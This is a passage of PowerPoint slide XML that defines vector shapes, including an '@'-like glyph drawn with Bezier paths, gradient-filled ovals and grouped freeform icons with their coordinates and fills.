                        <a:gd name="T73" fmla="*/ 87 h 119"/>
                        <a:gd name="T74" fmla="*/ 20 w 109"/>
                        <a:gd name="T75" fmla="*/ 65 h 119"/>
                        <a:gd name="T76" fmla="*/ 29 w 109"/>
                        <a:gd name="T77" fmla="*/ 35 h 119"/>
                        <a:gd name="T78" fmla="*/ 51 w 109"/>
                        <a:gd name="T79" fmla="*/ 21 h 119"/>
                        <a:gd name="T80" fmla="*/ 60 w 109"/>
                        <a:gd name="T81" fmla="*/ 23 h 119"/>
                        <a:gd name="T82" fmla="*/ 67 w 109"/>
                        <a:gd name="T83" fmla="*/ 31 h 119"/>
                        <a:gd name="T84" fmla="*/ 69 w 109"/>
                        <a:gd name="T85" fmla="*/ 23 h 119"/>
                        <a:gd name="T86" fmla="*/ 83 w 109"/>
                        <a:gd name="T87" fmla="*/ 23 h 119"/>
                        <a:gd name="T88" fmla="*/ 35 w 109"/>
                        <a:gd name="T89" fmla="*/ 69 h 119"/>
                        <a:gd name="T90" fmla="*/ 39 w 109"/>
                        <a:gd name="T91" fmla="*/ 81 h 119"/>
                        <a:gd name="T92" fmla="*/ 46 w 109"/>
                        <a:gd name="T93" fmla="*/ 85 h 119"/>
                        <a:gd name="T94" fmla="*/ 54 w 109"/>
                        <a:gd name="T95" fmla="*/ 81 h 119"/>
                        <a:gd name="T96" fmla="*/ 60 w 109"/>
                        <a:gd name="T97" fmla="*/ 66 h 119"/>
                        <a:gd name="T98" fmla="*/ 63 w 109"/>
                        <a:gd name="T99" fmla="*/ 46 h 119"/>
                        <a:gd name="T100" fmla="*/ 60 w 109"/>
                        <a:gd name="T101" fmla="*/ 36 h 119"/>
                        <a:gd name="T102" fmla="*/ 53 w 109"/>
                        <a:gd name="T103" fmla="*/ 32 h 119"/>
                        <a:gd name="T104" fmla="*/ 45 w 109"/>
                        <a:gd name="T105" fmla="*/ 36 h 119"/>
                        <a:gd name="T106" fmla="*/ 38 w 109"/>
                        <a:gd name="T107" fmla="*/ 50 h 119"/>
                        <a:gd name="T108" fmla="*/ 35 w 109"/>
                        <a:gd name="T109" fmla="*/ 69 h 11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  <a:cxn ang="0">
                          <a:pos x="T86" y="T87"/>
                        </a:cxn>
                        <a:cxn ang="0">
                          <a:pos x="T88" y="T89"/>
                        </a:cxn>
                        <a:cxn ang="0">
                          <a:pos x="T90" y="T91"/>
                        </a:cxn>
                        <a:cxn ang="0">
                          <a:pos x="T92" y="T93"/>
                        </a:cxn>
                        <a:cxn ang="0">
                          <a:pos x="T94" y="T95"/>
                        </a:cxn>
                        <a:cxn ang="0">
                          <a:pos x="T96" y="T97"/>
                        </a:cxn>
                        <a:cxn ang="0">
                          <a:pos x="T98" y="T99"/>
                        </a:cxn>
                        <a:cxn ang="0">
                          <a:pos x="T100" y="T101"/>
                        </a:cxn>
                        <a:cxn ang="0">
                          <a:pos x="T102" y="T103"/>
                        </a:cxn>
                        <a:cxn ang="0">
                          <a:pos x="T104" y="T105"/>
                        </a:cxn>
                        <a:cxn ang="0">
                          <a:pos x="T106" y="T107"/>
                        </a:cxn>
                        <a:cxn ang="0">
                          <a:pos x="T108" y="T109"/>
                        </a:cxn>
                      </a:cxnLst>
                      <a:rect l="0" t="0" r="r" b="b"/>
                      <a:pathLst>
                        <a:path w="109" h="119">
                          <a:moveTo>
                            <a:pt x="83" y="23"/>
                          </a:moveTo>
                          <a:cubicBezTo>
                            <a:pt x="74" y="78"/>
                            <a:pt x="74" y="78"/>
                            <a:pt x="74" y="78"/>
                          </a:cubicBezTo>
                          <a:cubicBezTo>
                            <a:pt x="73" y="79"/>
                            <a:pt x="73" y="80"/>
                            <a:pt x="73" y="80"/>
                          </a:cubicBezTo>
                          <a:cubicBezTo>
                            <a:pt x="73" y="81"/>
                            <a:pt x="73" y="82"/>
                            <a:pt x="74" y="82"/>
                          </a:cubicBezTo>
                          <a:cubicBezTo>
                            <a:pt x="75" y="83"/>
                            <a:pt x="75" y="83"/>
                            <a:pt x="76" y="83"/>
                          </a:cubicBezTo>
                          <a:cubicBezTo>
                            <a:pt x="78" y="83"/>
                            <a:pt x="81" y="82"/>
                            <a:pt x="84" y="80"/>
                          </a:cubicBezTo>
                          <a:cubicBezTo>
                            <a:pt x="88" y="77"/>
                            <a:pt x="91" y="73"/>
                            <a:pt x="94" y="68"/>
                          </a:cubicBezTo>
                          <a:cubicBezTo>
                            <a:pt x="96" y="63"/>
                            <a:pt x="98" y="57"/>
                            <a:pt x="98" y="49"/>
                          </a:cubicBezTo>
                          <a:cubicBezTo>
                            <a:pt x="98" y="37"/>
                            <a:pt x="94" y="28"/>
                            <a:pt x="87" y="20"/>
                          </a:cubicBezTo>
                          <a:cubicBezTo>
                            <a:pt x="80" y="13"/>
                            <a:pt x="70" y="10"/>
                            <a:pt x="58" y="10"/>
                          </a:cubicBezTo>
                          <a:cubicBezTo>
                            <a:pt x="49" y="10"/>
                            <a:pt x="41" y="12"/>
                            <a:pt x="33" y="16"/>
                          </a:cubicBezTo>
                          <a:cubicBezTo>
                            <a:pt x="26" y="20"/>
                            <a:pt x="20" y="26"/>
                            <a:pt x="16" y="34"/>
                          </a:cubicBezTo>
                          <a:cubicBezTo>
                            <a:pt x="13" y="42"/>
                            <a:pt x="11" y="51"/>
                            <a:pt x="11" y="60"/>
                          </a:cubicBezTo>
                          <a:cubicBezTo>
                            <a:pt x="11" y="75"/>
                            <a:pt x="15" y="87"/>
                            <a:pt x="24" y="96"/>
                          </a:cubicBezTo>
                          <a:cubicBezTo>
                            <a:pt x="32" y="104"/>
                            <a:pt x="43" y="109"/>
                            <a:pt x="57" y="109"/>
                          </a:cubicBezTo>
                          <a:cubicBezTo>
                            <a:pt x="64" y="109"/>
                            <a:pt x="70" y="107"/>
                            <a:pt x="76" y="105"/>
                          </a:cubicBezTo>
                          <a:cubicBezTo>
                            <a:pt x="82" y="103"/>
                            <a:pt x="88" y="100"/>
                            <a:pt x="94" y="96"/>
                          </a:cubicBezTo>
                          <a:cubicBezTo>
                            <a:pt x="109" y="96"/>
                            <a:pt x="109" y="96"/>
                            <a:pt x="109" y="96"/>
                          </a:cubicBezTo>
                          <a:cubicBezTo>
                            <a:pt x="105" y="100"/>
                            <a:pt x="101" y="104"/>
                            <a:pt x="97" y="106"/>
                          </a:cubicBezTo>
                          <a:cubicBezTo>
                            <a:pt x="92" y="110"/>
                            <a:pt x="86" y="113"/>
                            <a:pt x="79" y="115"/>
                          </a:cubicBezTo>
                          <a:cubicBezTo>
                            <a:pt x="73" y="118"/>
                            <a:pt x="65" y="119"/>
                            <a:pt x="57" y="119"/>
                          </a:cubicBezTo>
                          <a:cubicBezTo>
                            <a:pt x="46" y="119"/>
                            <a:pt x="36" y="116"/>
                            <a:pt x="28" y="111"/>
                          </a:cubicBezTo>
                          <a:cubicBezTo>
                            <a:pt x="19" y="106"/>
                            <a:pt x="12" y="99"/>
                            <a:pt x="7" y="90"/>
                          </a:cubicBezTo>
                          <a:cubicBezTo>
                            <a:pt x="2" y="81"/>
                            <a:pt x="0" y="71"/>
                            <a:pt x="0" y="60"/>
                          </a:cubicBezTo>
                          <a:cubicBezTo>
                            <a:pt x="0" y="49"/>
                            <a:pt x="2" y="38"/>
                            <a:pt x="7" y="29"/>
                          </a:cubicBezTo>
                          <a:cubicBezTo>
                            <a:pt x="12" y="19"/>
                            <a:pt x="19" y="12"/>
                            <a:pt x="28" y="7"/>
                          </a:cubicBezTo>
                          <a:cubicBezTo>
                            <a:pt x="36" y="2"/>
                            <a:pt x="46" y="0"/>
                            <a:pt x="58" y="0"/>
                          </a:cubicBezTo>
                          <a:cubicBezTo>
                            <a:pt x="73" y="0"/>
                            <a:pt x="85" y="4"/>
                            <a:pt x="94" y="13"/>
                          </a:cubicBezTo>
                          <a:cubicBezTo>
                            <a:pt x="104" y="23"/>
                            <a:pt x="109" y="35"/>
                            <a:pt x="109" y="49"/>
                          </a:cubicBezTo>
                          <a:cubicBezTo>
                            <a:pt x="109" y="58"/>
                            <a:pt x="107" y="66"/>
                            <a:pt x="103" y="73"/>
                          </a:cubicBezTo>
                          <a:cubicBezTo>
                            <a:pt x="99" y="80"/>
                            <a:pt x="94" y="86"/>
                            <a:pt x="87" y="90"/>
                          </a:cubicBezTo>
                          <a:cubicBezTo>
                            <a:pt x="81" y="93"/>
                            <a:pt x="76" y="95"/>
                            <a:pt x="72" y="95"/>
                          </a:cubicBezTo>
                          <a:cubicBezTo>
                            <a:pt x="69" y="95"/>
                            <a:pt x="66" y="94"/>
                            <a:pt x="64" y="93"/>
                          </a:cubicBezTo>
                          <a:cubicBezTo>
                            <a:pt x="63" y="92"/>
                            <a:pt x="61" y="89"/>
                            <a:pt x="60" y="87"/>
                          </a:cubicBezTo>
                          <a:cubicBezTo>
                            <a:pt x="57" y="90"/>
                            <a:pt x="54" y="92"/>
                            <a:pt x="52" y="93"/>
                          </a:cubicBezTo>
                          <a:cubicBezTo>
                            <a:pt x="49" y="94"/>
                            <a:pt x="46" y="95"/>
                            <a:pt x="43" y="95"/>
                          </a:cubicBezTo>
                          <a:cubicBezTo>
                            <a:pt x="37" y="95"/>
                            <a:pt x="32" y="92"/>
                            <a:pt x="27" y="87"/>
                          </a:cubicBezTo>
                          <a:cubicBezTo>
                            <a:pt x="22" y="82"/>
                            <a:pt x="20" y="75"/>
                            <a:pt x="20" y="65"/>
                          </a:cubicBezTo>
                          <a:cubicBezTo>
                            <a:pt x="20" y="54"/>
                            <a:pt x="23" y="44"/>
                            <a:pt x="29" y="35"/>
                          </a:cubicBezTo>
                          <a:cubicBezTo>
                            <a:pt x="35" y="26"/>
                            <a:pt x="42" y="21"/>
                            <a:pt x="51" y="21"/>
                          </a:cubicBezTo>
                          <a:cubicBezTo>
                            <a:pt x="54" y="21"/>
                            <a:pt x="57" y="22"/>
                            <a:pt x="60" y="23"/>
                          </a:cubicBezTo>
                          <a:cubicBezTo>
                            <a:pt x="62" y="25"/>
                            <a:pt x="65" y="27"/>
                            <a:pt x="67" y="31"/>
                          </a:cubicBezTo>
                          <a:cubicBezTo>
                            <a:pt x="69" y="23"/>
                            <a:pt x="69" y="23"/>
                            <a:pt x="69" y="23"/>
                          </a:cubicBezTo>
                          <a:cubicBezTo>
                            <a:pt x="83" y="23"/>
                            <a:pt x="83" y="23"/>
                            <a:pt x="83" y="23"/>
                          </a:cubicBezTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="35" y="69"/>
                          </a:moveTo>
                          <a:cubicBezTo>
                            <a:pt x="35" y="74"/>
                            <a:pt x="36" y="78"/>
                            <a:pt x="39" y="81"/>
                          </a:cubicBezTo>
                          <a:cubicBezTo>
                            <a:pt x="41" y="84"/>
                            <a:pt x="43" y="85"/>
                            <a:pt x="46" y="85"/>
                          </a:cubicBezTo>
                          <a:cubicBezTo>
                            <a:pt x="49" y="85"/>
                            <a:pt x="51" y="84"/>
                            <a:pt x="54" y="81"/>
                          </a:cubicBezTo>
                          <a:cubicBezTo>
                            <a:pt x="56" y="78"/>
                            <a:pt x="58" y="74"/>
                            <a:pt x="60" y="66"/>
                          </a:cubicBezTo>
                          <a:cubicBezTo>
                            <a:pt x="62" y="59"/>
                            <a:pt x="63" y="52"/>
                            <a:pt x="63" y="46"/>
                          </a:cubicBezTo>
                          <a:cubicBezTo>
                            <a:pt x="63" y="41"/>
                            <a:pt x="62" y="38"/>
                            <a:pt x="60" y="36"/>
                          </a:cubicBezTo>
                          <a:cubicBezTo>
                            <a:pt x="58" y="33"/>
                            <a:pt x="56" y="32"/>
                            <a:pt x="53" y="32"/>
                          </a:cubicBezTo>
                          <a:cubicBezTo>
                            <a:pt x="50" y="32"/>
                            <a:pt x="47" y="33"/>
                            <a:pt x="45" y="36"/>
                          </a:cubicBezTo>
                          <a:cubicBezTo>
                            <a:pt x="42" y="39"/>
                            <a:pt x="39" y="44"/>
                            <a:pt x="38" y="50"/>
                          </a:cubicBezTo>
                          <a:cubicBezTo>
                            <a:pt x="36" y="57"/>
                            <a:pt x="35" y="63"/>
                            <a:pt x="35" y="69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6350" cmpd="sng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1716" name="Group 1715">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C00DFA07-445C-430E-AC2D-8DC2B99A23FA}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="6180835" y="1979374"/>
              <a:ext cx="1066881" cy="498226"/>
              <a:chOff x="2651125" y="2851150"/>
              <a:chExt cx="1298575" cy="606425"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="1928" name="Group 521">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C9CDDE2E-EEA7-44A0-A3A8-C9E640E76C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90863" y="3089275"/>
                <a:ext cx="368300" cy="368300"/>
                <a:chOff x="1625" y="1092"/>
                <a:chExt cx="787" cy="787"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="1987" name="Oval 522">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{02752732-64A0-49E2-96C3-3D341A6935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1625" y="1092"/>
                  <a:ext cx="787" cy="787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DDDDDD"/>
                    </a:gs>
                    <a:gs pos="100000">
                      <a:srgbClr val="DDDDDD">
                        <a:gamma/>
                        <a:shade val="46275"/>
                        <a:invGamma/>
                      </a:srgbClr>
                    </a:gs>
                  </a:gsLst>
                  <a:lin ang="54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88" name="Oval 523">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C412AA26-2AA7-412D-A413-8B80AD8C7F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1651" y="1118"/>
                  <a:ext cx="735" cy="735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DDDDDD"/>
                    </a:gs>
                    <a:gs pos="100000">
                      <a:srgbClr val="DDDDDD">
                        <a:gamma/>
                        <a:shade val="56078"/>
                        <a:invGamma/>
                      </a:srgbClr>
                    </a:gs>
                  </a:gsLst>
                  <a:path path="shape">
                    <a:fillToRect l="50000" t="50000" r="50000" b="50000"/>
                  </a:path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89" name="Freeform 524">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2FCEBEBB-1C32-4A8D-B810-4F37DB70414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51" y="1118"/>
                  <a:ext cx="734" cy="435"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 531 w 1063"/>
                    <a:gd name="T1" fmla="*/ 363 h 629"/>
                    <a:gd name="T2" fmla="*/ 1054 w 1063"/>
                    <a:gd name="T3" fmla="*/ 629 h 629"/>
                    <a:gd name="T4" fmla="*/ 1063 w 1063"/>
                    <a:gd name="T5" fmla="*/ 531 h 629"/>
                    <a:gd name="T6" fmla="*/ 531 w 1063"/>
                    <a:gd name="T7" fmla="*/ 0 h 629"/>
                    <a:gd name="T8" fmla="*/ 0 w 1063"/>
                    <a:gd name="T9" fmla="*/ 531 h 629"/>
                    <a:gd name="T10" fmla="*/ 9 w 1063"/>
                    <a:gd name="T11" fmla="*/ 629 h 629"/>
                    <a:gd name="T12" fmla="*/ 531 w 1063"/>
                    <a:gd name="T13" fmla="*/ 363 h 6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63" h="629">
                      <a:moveTo>
                        <a:pt x="531" y="363"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="748" y="363"/>
                        <a:pt x="940" y="468"/>
                        <a:pt x="1054" y="629"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="1059" y="597"/>
                        <a:pt x="1063" y="564"/>
                        <a:pt x="1063" y="531"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="1063" y="238"/>
                        <a:pt x="825" y="0"/>
                        <a:pt x="531" y="0"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="238" y="0"/>
                        <a:pt x="0" y="238"/>
                        <a:pt x="0" y="531"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="0" y="564"/>
                        <a:pt x="3" y="597"/>
                        <a:pt x="9" y="629"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="123" y="468"/>
                        <a:pt x="314" y="363"/>
                        <a:pt x="531" y="36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969696">
                        <a:gamma/>
                        <a:tint val="10196"/>
                        <a:invGamma/>
                      </a:srgbClr>
                    </a:gs>
                    <a:gs pos="100000">
                      <a:srgbClr val="969696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29" name="Group 799">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3A0DA55D-B428-403B-8951-0316B36217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68688" y="2851150"/>
                <a:ext cx="481012" cy="388938"/>
                <a:chOff x="2154" y="1819"/>
                <a:chExt cx="217" cy="176"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:grpSp>
              <p:nvGrpSpPr>
                <p:cNvPr id="1959" name="Group 800">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A4F42A1B-ADEC-4D05-85C9-0577C00E163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154" y="1862"/>
                  <a:ext cx="217" cy="133"/>
                  <a:chOff x="1977" y="2705"/>
                  <a:chExt cx="897" cy="548"/>
                </a:xfrm>
              </p:grpSpPr>
              <p:sp>
                <p:nvSpPr>
                  <p:cNvPr id="1975" name="Freeform 801">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{54A5CDD7-F1A0-4E2F-B6EB-5AE6E064BB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977" y="2787"/>
                    <a:ext cx="45" cy="321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3 h 87"/>
                      <a:gd name="T4" fmla="*/ 0 w 12"/>
                      <a:gd name="T5" fmla="*/ 0 h 87"/>
                      <a:gd name="T6" fmla="*/ 12 w 12"/>
                      <a:gd name="T7" fmla="*/ 3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3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6" name="Freeform 802">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7C86FDBF-8495-404C-B507-5CFF3F8A21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022" y="2787"/>
                    <a:ext cx="46" cy="321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3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3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7" name="Freeform 803">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{02C417E7-6052-4882-887D-08678B7B3B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574" y="2932"/>
                    <a:ext cx="45" cy="321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8" name="Freeform 804">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0ACBD44E-1E95-43B5-957D-874C59B905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529" y="2932"/>
                    <a:ext cx="45" cy="321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3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9" name="Freeform 805">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C62CEC48-8E49-4E00-89DE-FC567DC94D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829" y="2866"/>
                    <a:ext cx="45" cy="321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4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0" name="Freeform 806">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E11C7146-4FB1-422B-952C-C471023B97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780" y="2866"/>
                    <a:ext cx="49" cy="321"/>
                  </a:xfrm>
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst>
                      <a:gd name="T0" fmla="*/ 13 w 13"/>
                      <a:gd name="T1" fmla="*/ 87 h 87"/>
                      <a:gd name="T2" fmla="*/ 0 w 13"/>
                      <a:gd name="T3" fmla="*/ 84 h 87"/>
                      <a:gd name="T4" fmla="*/ 0 w 13"/>
                      <a:gd name="T5" fmla="*/ 0 h 87"/>
                      <a:gd name="T6" fmla="*/ 13 w 13"/>
                      <a:gd name="T7" fmla="*/ 4 h 87"/>
                      <a:gd name="T8" fmla="*/ 13 w 13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87">
                        <a:moveTo>
                          <a:pt x="13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3" y="4"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="13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1" name="Freeform 807">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{21630658-F575-497A-833D-DACAB94CEF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277" y="2705"/>
                    <a:ext cx="45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3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2" name="Freeform 808">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{17CA1248-830E-4600-B92C-CA1A58EACC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277" y="2717"/>
                    <a:ext cx="45" cy="322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4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3" name="Freeform 809">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2DC30B0A-FDE8-4D5D-88BA-6F0350C075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235" y="2717"/>
                    <a:ext cx="42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4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4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4" name="Freeform 810">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AA445401-AD78-45FE-BF31-C5E015E97F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977" y="2787"/>
                    <a:ext cx="597" cy="206"/>
                  </a:xfrm>
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst>
                      <a:gd name="T0" fmla="*/ 161 w 161"/>
                      <a:gd name="T1" fmla="*/ 43 h 56"/>
                      <a:gd name="T2" fmla="*/ 161 w 161"/>
                      <a:gd name="T3" fmla="*/ 56 h 56"/>
                      <a:gd name="T4" fmla="*/ 0 w 161"/>
                      <a:gd name="T5" fmla="*/ 12 h 56"/>
                      <a:gd name="T6" fmla="*/ 0 w 161"/>
                      <a:gd name="T7" fmla="*/ 0 h 56"/>
                      <a:gd name="T8" fmla="*/ 161 w 161"/>
                      <a:gd name="T9" fmla="*/ 43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1" h="56">
                        <a:moveTo>
                          <a:pt x="161" y="43"/>
                        </a:moveTo>
                        <a:lnTo>
                          <a:pt x="161" y="56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61" y="43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5" name="Freeform 811">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8FA10D78-BB68-437F-9780-B179ECF4F9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574" y="2866"/>
                    <a:ext cx="300" cy="127"/>
                  </a:xfrm>
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst>
                      <a:gd name="T0" fmla="*/ 81 w 81"/>
                      <a:gd name="T1" fmla="*/ 0 h 35"/>
                      <a:gd name="T2" fmla="*/ 81 w 81"/>
                      <a:gd name="T3" fmla="*/ 13 h 35"/>
                      <a:gd name="T4" fmla="*/ 0 w 81"/>
                      <a:gd name="T5" fmla="*/ 35 h 35"/>
                      <a:gd name="T6" fmla="*/ 0 w 81"/>
                      <a:gd name="T7" fmla="*/ 22 h 35"/>
                      <a:gd name="T8" fmla="*/ 81 w 8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1" h="35">
                        <a:moveTo>
                          <a:pt x="81" y="0"/>
                        </a:moveTo>
                        <a:lnTo>
                          <a:pt x="81" y="13"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="0" y="35"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="0" y="22"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="81" y="0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6" name="Freeform 812">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D0592933-89B6-45FC-9C02-B91E8559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977" y="2705"/>
                    <a:ext cx="897" cy="240"/>
                  </a:xfrm>
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst>
                      <a:gd name="T0" fmla="*/ 242 w 242"/>
                      <a:gd name="T1" fmla="*/ 43 h 65"/>
                      <a:gd name="T2" fmla="*/ 161 w 242"/>
                      <a:gd name="T3" fmla="*/ 22 h 65"/>
                      <a:gd name="T4" fmla="*/ 161 w 242"/>
                      <a:gd name="T5" fmla="*/ 22 h 65"/>
                      <a:gd name="T6" fmla="*/ 81 w 242"/>
                      <a:gd name="T7" fmla="*/ 0 h 65"/>
                      <a:gd name="T8" fmla="*/ 0 w 242"/>
                      <a:gd name="T9" fmla="*/ 22 h 65"/>
                      <a:gd name="T10" fmla="*/ 81 w 242"/>
                      <a:gd name="T11" fmla="*/ 44 h 65"/>
                      <a:gd name="T12" fmla="*/ 81 w 242"/>
                      <a:gd name="T13" fmla="*/ 44 h 65"/>
                      <a:gd name="T14" fmla="*/ 161 w 242"/>
                      <a:gd name="T15" fmla="*/ 65 h 65"/>
                      <a:gd name="T16" fmla="*/ 242 w 242"/>
                      <a:gd name="T17" fmla="*/ 43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42" h="65">
                        <a:moveTo>
                          <a:pt x="242" y="43"/>
                        </a:moveTo>
                        <a:lnTo>
                          <a:pt x="161" y="22"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="161" y="22"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="81" y="0"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="0" y="22"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="81" y="44"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="81" y="44"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="161" y="65"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="242" y="43"/>
                        </a:lnTo>
                        <a:close/>
                      </a:path>
                    </a:pathLst>
                  </a:custGeom>
                  <a:solidFill>
                    <a:srgbClr val="8E47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60" name="Group 813">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{26F9D382-F926-47FA-AF3C-BC104F18032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216" y="1833"/>
                  <a:ext cx="90" cy="70"/>
                  <a:chOff x="2155" y="1811"/>
                  <a:chExt cx="675" cy="523"/>
                </a:xfrm>
              </p:grpSpPr>
              <p:sp>
                <p:nvSpPr>
                  <p:cNvPr id="1967" name="Freeform 814">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DAAE7DCA-872C-4D14-8426-258B657295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490" y="1818"/>
                    <a:ext cx="314" cy="433"/>
                  </a:xfrm>
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst>
                      <a:gd name="T0" fmla="*/ 0 w 4460"/>
                      <a:gd name="T1" fmla="*/ 0 h 6160"/>
                      <a:gd name="T2" fmla="*/ 0 w 4460"/>
                      <a:gd name="T3" fmla="*/ 4972 h 6160"/>
                      <a:gd name="T4" fmla="*/ 4460 w 4460"/>
                      <a:gd name="T5" fmla="*/ 6160 h 6160"/>
                      <a:gd name="T6" fmla="*/ 4460 w 4460"/>
                      <a:gd name="T7" fmla="*/ 1188 h 6160"/>
                      <a:gd name="T8" fmla="*/ 0 w 4460"/>
                      <a:gd name="T9" fmla="*/ 0 h 61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460" h="6160">
                        <a:moveTo>
                          <a:pt x="0" y="0"/>
                        </a:moveTo>
                        <a:lnTo>
                          <a:pt x="0" y="4972"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="4460" y="6160"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="4460" y="118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969696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8" name="Freeform 815">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7735B4F7-9DD2-4155-85A9-18AAC939A8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513" y="1850"/>
                    <a:ext cx="268" cy="332"/>
                  </a:xfrm>
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst>
                      <a:gd name="T0" fmla="*/ 0 w 3803"/>
                      <a:gd name="T1" fmla="*/ 0 h 4725"/>
                      <a:gd name="T2" fmla="*/ 0 w 3803"/>
                      <a:gd name="T3" fmla="*/ 3711 h 4725"/>
                      <a:gd name="T4" fmla="*/ 3803 w 3803"/>
                      <a:gd name="T5" fmla="*/ 4725 h 4725"/>
                      <a:gd name="T6" fmla="*/ 3803 w 3803"/>
                      <a:gd name="T7" fmla="*/ 1014 h 4725"/>
                      <a:gd name="T8" fmla="*/ 0 w 3803"/>
                      <a:gd name="T9" fmla="*/ 0 h 47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03" h="4725">
                        <a:moveTo>
                          <a:pt x="0" y="0"/>
                        </a:moveTo>
                        <a:lnTo>
                          <a:pt x="0" y="3711"/>
                        </a:lnTo>
